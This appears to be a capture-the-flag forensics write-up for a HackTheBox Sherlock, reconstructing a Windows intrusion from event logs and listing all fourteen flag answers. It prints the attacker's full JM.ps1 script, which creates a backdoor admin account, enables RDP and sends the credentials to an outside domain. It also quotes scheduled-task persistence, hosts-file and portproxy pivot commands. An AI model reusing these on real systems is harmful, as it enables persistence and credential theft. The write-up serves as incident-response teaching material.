the enduring echo
this one is still an easy challenge, but it requires some extra steps (and tools). it's dfir...
Difficulty: Easy
Narrative:
LeStrade passes a disk image artifacts to Watson. It’s one of the identified breach points, now showing abnormal CPU activity and anomalies in process logs
at this point i wonder why the s was uppercase...
tldr;
1
What was the first (non cd) command executed by the attacker on the host? (string)
systeminfo
evtx timeline - filter Event ID 4688 (Process Creation), sort by time, find earliest non-cd command in Details field
2
What was the parent process spawning the attacker's commands? (C:\FOLDER\PATH\FILE.ext)
C:\Windows\System32\wbem\WmiPrvSE.exe
Same 4688 events - check ExtraFieldInfo field for ParentProcessName - WMI Provider Host indicates WMI-based execution
3
Which remote-execution tool was most likely used for the attack? (filename.ext)
wmiexec.py
Command pattern in 4688: cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__... with WmiPrvSE parent = classic Impacket wmiexec signature
4
What was the attacker's IP address? (IPv4 address)
10.129.242.110
Defender log shows hosts file modification: echo 10.129.242.110 NapoleonsBlackPearl.htb >> C:\Windows\System32\drivers\etc\hosts
5
What is the first element in the attacker's sequence of persistence mechanisms? (string)
SysHelper Update
Scheduled task creation in Defender log + task file C:\Windows\System32\Tasks\SysHelper Update with 2-minute repetition
6
Identify the script executed by the persistence mechanism. (C:\FOLDER\PATH\FILE.ext)
C:\Users\Werni\AppData\Local\JM.ps1
Task XML arguments field contains -File C:\Users\Werni\Appdata\Local\JM.ps1 - executed by scheduled task
7
What local account did the attacker create? (string)
svc_netupd
JM.ps1 script contains username array, creates random user from @("svc_netupd", "svc_dns", "sys_helper", "WinTelemetry", "UpdaterSvc")
8
What domain name did the attacker use for credential exfiltration? (domain)
NapoleonsBlackPearl.htb
JM.ps1 script contains Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=..." for exfiltration
9
What password did the attacker's script generate for the newly created user? (string)
Watson_20250824160509
Password format: Watson_YYYYMMDDHHMMSS derived from first JM.ps1 Engine Start timestamp in Event 400
10
What was the IP address of the internal system the attacker pivoted to? (IPv4 address)
192.168.1.101
SSH known_hosts file contains target IP: C:\Users\Administrator\.ssh\known_hosts first line
11
Which TCP port on the victim was forwarded to enable the pivot? (port 0-65565)
9999
evtx timeline shows netsh interface portproxy add command with listenport=9999
12
What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings? (HKLM\...\...)
HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
Standard Windows registry location for netsh interface portproxy persistent entries
13
What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system? (Txxxx.xxx)
T1090.001
Port forwarding via compromised host = Internal Proxy sub-technique of T1090 (Proxy)
14
Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this? (command)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
Registry modification to enable command-line capture in Event ID 4688 - why we can see full commands in timeline
what we have?
we inherit a cold image of a workstation: HEISEN-9-WS-6, a windows 10 box that may have been compromised. one responder ran kape (kroll artifact parser and extractor) to sweep the C/ drive. those kape logs show what was copied, what wasn’t, and under what constraints. we again focus on the event logs (lol 🐧). there are plenty of tools you can use to convert the evtx files into something readable; while solving this challenge i used hayabusa and python-evtx. pipe the evtxs into a single timeline, and from that river of events we reconstructed the whole incident.
besides the cold image we also have some kape logs
2025-08-25T20_20_59_5246365_ConsoleLog.txt: responder kape run log (host identity, command line, targets, second‑by‑second copy narrative)2025-08-25T20_20_59_5246365_CopyLog.csv: ledger of each source file copied, destination path, timestamps2025-08-25T20_20_59_5246365_SkipLog.csv.csv: items kape could not copy (locked / unauthorized / excluded). the double extension is unexplained
solulu
flag 1
What was the first (non cd) command executed by the attacker on the host? (string)
this turned out more interesting than it first looked. I temporarily solved some easier questions (I actually got flag 14 before this one). lesson learned: read all questions in a sherlock before diving in chronologically. I confirmed the real starting point when I found this evidence at:
The_Enduring_Echo/C/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt
command‑line logging had been enabled, which is why we later see full 4688 command lines.
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f`next, I passed the evtx files to hayabusa to build a consolidated csv timeline. you could use EvtxECmd, or any evtx parser; I used hayabusa plus this python implementation.
./hayabusa-3.5.0-lin-x64-gnu csv -d 'The_Enduring_Echo/C/Windows/System32/winevt/logs' -o haya.csvopen that in a sheet; target security event id 4688 (process creation) since the admin enabled command‑line capture. sort by time; the earliest non cd command is the flag.
I will also show the alternative if you prefer python
# pip install python-evtx
python q1.py The_Enduring_Echo/C/Windows/System32/winevt/logs/Security.evtx > Security.xml
# and then grep all the commands
cat Security.xml | grep 'CommandLine.*127\.0\.0\.1' > Command.xml
flag: systeminfo
flag 2
Which parent process (full path) spawned the attacker’s commands? (C:\FOLDER\PATH\FILE.ext)
all attacker commands share the same parent process. just filter / search once to confirm consistency.
flag: C:\Windows\System32\wbem\WmiPrvSE.exe
flag 3
Which remote-execution tool was most likely used for the attack? (filename.ext)
wasn't sure at first, so I searched.
after some reading, the tool is clearly wmiexec.py based on two criteria:
Parent process is
WmiPrvSE.exe→ we confirms WMI‑based execution channel.Commands redirect output to
\\127.0.0.1\ADMIN$\__...→ a distinctive pattern used by Impacket’swmiexec.pyto collect stdout/stderr via the target’sADMIN$share.
flag: wmiexec.py
flag 4
What was the attacker’s IP address? (IPv4 address)
reviewing the commands the attacker ran, we quickly identify the one that adds the ip + domain into the hosts file. from that we track the exact instance:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}"></Provider>
<EventID Qualifiers="">4688</EventID>
<Version>2</Version>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2025-08-24 23:00:15.200260+00:00"></TimeCreated>
<EventRecordID>4414</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></Correlation>
<Execution ProcessID="4" ThreadID="5688"></Execution>
<Channel>Security</Channel>
<Computer>Heisen-9-WS-6</Computer>
<Security UserID=""></Security>
</System>
<EventData><Data Name="SubjectUserSid">S-1-5-20</Data>
<Data Name="SubjectUserName">HEISEN-9-WS-6$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="SubjectLogonId">0x00000000000003e4</Data>
<Data Name="NewProcessId">0x000000000000150c</Data>
<Data Name="NewProcessName">C:\Windows\System32\cmd.exe</Data>
<Data Name="TokenElevationType">%%1936</Data>
<Data Name="ProcessId">0x0000000000000f34</Data>
<Data Name="CommandLine">cmd.exe /Q /c cmd /C "echo 10.129.242.110 NapoleonsBlackPearl.htb >> C:\Windows\System32\drivers\etc\hosts" 1> \\127.0.0.1\ADMIN$\__1756075857.955773 2>&1</Data>
<Data Name="TargetUserSid">S-1-0-0</Data>
<Data Name="TargetUserName">Werni</Data>
<Data Name="TargetDomainName">HEISEN-9-WS-6</Data>
<Data Name="TargetLogonId">0x00000000004373b0</Data>
<Data Name="ParentProcessName">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name="MandatoryLabel">S-1-16-12288</Data>
</EventData>
</Event>Also, nice reference to the NapoleonsBlackPearl
flag: 10.129.242.110
flag 5
What is the first element in the attacker's sequence of persistence mechanisms? (string)
tbh — I got the answer by some wild guessing at first, from the previous challenge — the card, we know that we have received a "greeting" from JM, so I simply trace for any JM in this project
And yur....I noted 2 files down, the MPLog-20250421-104305.log and the SysHelper Update in the Windows\System32\Tasks\ directory. Of course, we already have all the commands executed by the attacker from flag 2. These 2 files help confirmed my answer when I finally shift my focus to this command
<Data Name="CommandLine">cmd.exe /Q /c schtasks /create /tn "SysHelper Update" /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Werni\Appdata\Local\JM.ps1" /sc minute /mo 2 /ru SYSTEM /f 1> \\127.0.0.1\ADMIN$\__1756076432.886685 2>&1</Data>
CopyLog entry timestamp cluster (ModifiedOnUtc for task file): 2025-08-24 23:03:50.3672980 aligns exactly with Defender log. Hence the answer is "SysHelper Update". Other persistence (e.g., port proxy registry entries or additional tasks) occurs after (see later answers for Q11/Q12), making SysHelper Update the starting point in the persistence chain.
flag: SysHelper Update
flag 6
Identify the script executed by the persistence mechanism. (C:\FOLDER\PATH\FILE.ext)
flags 5 and 6 go hand in hand. same command, same time, when the script JM.ps1 first loaded.
<Data Name="CommandLine">cmd.exe /Q /c schtasks /create /tn "SysHelper Update" /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Werni\Appdata\Local\JM.ps1" /sc minute /mo 2 /ru SYSTEM /f 1> \\127.0.0.1\ADMIN$\__1756076432.886685 2>&1</Data>flag: C:\Users\Werni\AppData\Local\JM.ps1
flag 7
What local account did the attacker create? (string)
well...since we know the script, its time for us to investigate it!
# JM.ps1
# List of potential usernames
$usernames = @("svc_netupd", "svc_dns", "sys_helper", "WinTelemetry", "UpdaterSvc")
# Check for existing user
$existing = $usernames | Where-Object {
Get-LocalUser -Name $_ -ErrorAction SilentlyContinue
}
# If none exist, create a new one
if (-not $existing) {
$newUser = Get-Random -InputObject $usernames
$timestamp = (Get-Date).ToString("yyyyMMddHHmmss")
$password = "Watson_$timestamp"
$securePass = ConvertTo-SecureString $password -AsPlainText -Force
New-LocalUser -Name $newUser -Password $securePass -FullName "Windows Update Helper" -Description "System-managed service account"
Add-LocalGroupMember -Group "Administrators" -Member $newUser
Add-LocalGroupMember -Group "Remote Desktop Users" -Member $newUser
# Enable RDP
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("$newUser|$password")))" -UseBasicParsing -ErrorAction SilentlyContinue | Out-Null
}although we have a list of potential usernames, the only username appear in our log is svc_netupd
Answer confirmed from both log timeline of hayabusa (the entire log folder timeline), and evtx parser (just security.evtx)
<EventData><Data Name="TargetUserName">svc_netupd</Data>
<Data Name="TargetDomainName">HEISEN-9-WS-6</Data>
<Data Name="TargetSid">S-1-5-21-3871582759-1638593395-315824688-1003</Data>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">HEISEN-9-WS-6$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="SubjectLogonId">0x00000000000003e7</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="SamAccountName">svc_netupd</Data>
<Data Name="DisplayName">%%1793</Data>
<Data Name="UserPrincipalName">-</Data>
<Data Name="HomeDirectory">%%1793</Data>
<Data Name="HomePath">%%1793</Data>
<Data Name="ScriptPath">%%1793</Data>
<Data Name="ProfilePath">%%1793</Data>
<Data Name="UserWorkstations">%%1793</Data>
<Data Name="PasswordLastSet">%%1794</Data>
<Data Name="AccountExpires">%%1794</Data>
<Data Name="PrimaryGroupId">513</Data>
<Data Name="AllowedToDelegateTo">-</Data>
<Data Name="OldUacValue">0x0</Data>
<Data Name="NewUacValue">0x15</Data>
<Data Name="UserAccountControl">
%%2080
%%2082
%%2084</Data>
<Data Name="UserParameters">%%1793</Data>
<Data Name="SidHistory">-</Data>
<Data Name="LogonHours">%%1797</Data>
</EventData>
</Event>flag: svc_netupd
flag 8
What domain name did the attacker use for credential exfiltration? (domain)
present in JM.ps1 exfil HTTP request:
Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("$newUser|$password")))" -UseBasicParsing -ErrorAction SilentlyContinue | Out-NullWhat its doing is the defender log hosts modification preceding task creation inserts mapping for the same domain (see Q4). Domain used to receive Base64-encoded username|password pair.
flag: NapoleonsBlackPearl.htb
flag 9
What password did the attacker's script generate for the newly created user? (string)
I seen a lot of people struggle with this so the discord channel got some pretty interesting stuff going, but because of that it saved me from wasting time 😭. Essentially we now know thanks to Discord that the timezone is UTC, and from our log, we know that the user was created at 2025-08-24T23:05:09.764658Z.
But well, this is where people struggle, the reason is that the time zone on the workstation HEISEN-9-WS-6is different from UTC, so to pin point this, we have to figure out what timezone the machine is operating on. There are multiple ways to achieve this, I guess I go for the long way
# sudo apt install reglookup
❯ reglookup -p '/ControlSet001/Control/TimeZoneInformation' The_Enduring_Echo/C/Windows/System32/config/SYSTEM
PATH,TYPE,VALUE,MTIME
/ControlSet001/Control/TimeZoneInformation,KEY,,2025-04-21 18:42:48
/ControlSet001/Control/TimeZoneInformation/Bias,DWORD,0x000001E0,
/ControlSet001/Control/TimeZoneInformation/DaylightBias,DWORD,0xFFFFFFC4,
/ControlSet001/Control/TimeZoneInformation/DaylightName,SZ,@tzres.dll%2C-211,
/ControlSet001/Control/TimeZoneInformation/DaylightStart,BINARY,%00%00%03%00%02%00%02%00%00%00%00%00%00%00%00%00,
/ControlSet001/Control/TimeZoneInformation/StandardBias,DWORD,0x00000000,
/ControlSet001/Control/TimeZoneInformation/StandardName,SZ,@tzres.dll%2C-212,
/ControlSet001/Control/TimeZoneInformation/StandardStart,BINARY,%00%00%0B%00%01%00%02%00%00%00%00%00%00%00%00%00,
/ControlSet001/Control/TimeZoneInformation/TimeZoneKeyName,SZ,Pacific Standard Time,
/ControlSet001/Control/TimeZoneInformation/DynamicDaylightTimeDisabled,DWORD,0x00000000,
/ControlSet001/Control/TimeZoneInformation/ActiveTimeBias,DWORD,0x000001A4,\This returns Pacific Standard Time (PST). We have to subtract the differences, and donezo, we got our password.
flag: Watson_20250824160509
flag 10
What was the IP address of the internal system the attacker pivoted to? (IPv4 address)
My way of solving this is I found this file
❯ cat C/Users/Administrator/.ssh/known_hosts
192.168.1.101 ecdsa-sha2-nistp256 [truncated]It seems that JM (my dude) is operating as Administrator. Almost certainly invoked the Windows OpenSSH client (C:\\Windows\\System32\\OpenSSH\\ssh.exe) to connect to the internal system at 192.168.1.101:22. On successful SSH handshake, the server’s host key was written to the known_hosts file.
Wonder what this ip is, I search it up in the folder using fuzzy search. What ultimately caught my eyes is this specific command in the log we parse from Security.evtx
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=192.168.1.101 connectport=22Well, with this command and at this point into the sherlocks, we have uncover the full mystery. That is why we have the .ssh of known hosts log the 192.168.1.101 ip because that is what they want. After their cd, systeminfo, directory poking, scheduled task, firewall disable, and then their final intent has revealed. This command creates a persistent TCP listener on the compromised host (all local IPv4 interfaces, port 9999) that silently forwards every inbound connection to 192.168.1.101:22 (SSH) inside the network—turning the victim into a relay (an internal proxy) so JM can reach the internal SSH service as if it were exposed externally.
flag: 192.168.1.101
flag 11
Which TCP port on the victim was forwarded to enable the pivot? (port 0-65565)
From the explanation above, port 9999
flag: 9999
flag 12
What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings? (HKLM......)
Since it is registry path, where else but we look at the system config hoho.
❯ reglookup C/Windows/System32/config/SYSTEM 2>&1 | grep v4tov4
/ControlSet001/Services/PortProxy/v4tov4,KEY,,2025-08-24 23:10:05
/ControlSet001/Services/PortProxy/v4tov4/tcp,KEY,,2025-08-24 23:10:05
/ControlSet001/Services/PortProxy/v4tov4/tcp/0.0.0.0%2F9999,SZ,192.168.1.101/22,
flag: HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
flag 13
What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system? (Txxxx.xxx)
Proxy (T1090) Sub-technique: Internal Proxy (T1090.001) — using a compromised host to proxy traffic to internal resources (here via netsh interface portproxy). Reference at:
flag: T1090.001
flag 14
Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this? (command)
As mentioned in flag 1, I got this piece of evident first to confirmed some of my assumption. Gladly I will repeat the answer in ConsoleHost_history.txt
ipconfig
powershell New-NetIPAddress -InterfaceAlias "Ethernet0" -IPAddress 172.18.6.3 -PrefixLength 24
ipconfig.exe
powershell New-NetIPAddress -InterfaceAlias "Ethernet0" -IPAddress 10.129.233.246 -PrefixLength 24
ipconfig
ncpa.cpl
ipconfig
ping 1.1.1.1
cd C:\Users\
ls
net user Werni Quantum1! /add
ls
net localgroup administrator Werni /add
net localgroup Administrators Werni /add
clear
wmic computersystem where name="%COMPUTERNAME%" call rename name="Heisen-9-WS-6"
ls
cd ..
ls
cd .\Users\
ls
net users
Rename-Conputer -NewName "Heisen-9-WS-6" -Force
Rename-Computer -NewName "Heisen-9-WS-6" -Force
net users
ls
net user felamos /delete
cd ..
ls
net users
cat .\Werni\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Enable-NetFirewallRule -DisplayGroup "Windows Management Instrumentation (WMI)"
Enable-NetFirewallRule -DisplayGroup "Remote Event Log Management"
Enable-NetFirewallRule -DisplayGroup "Remote Service Management"
auditpol /set /subcategory:"Process Creation" /success:enable
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
Set-MpPreference -DisableRealtimeMonitoring $true
Get-MpComputerStatus | Select-Object AMRunningMode, RealTimeProtectionEnabledflag: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
Last updated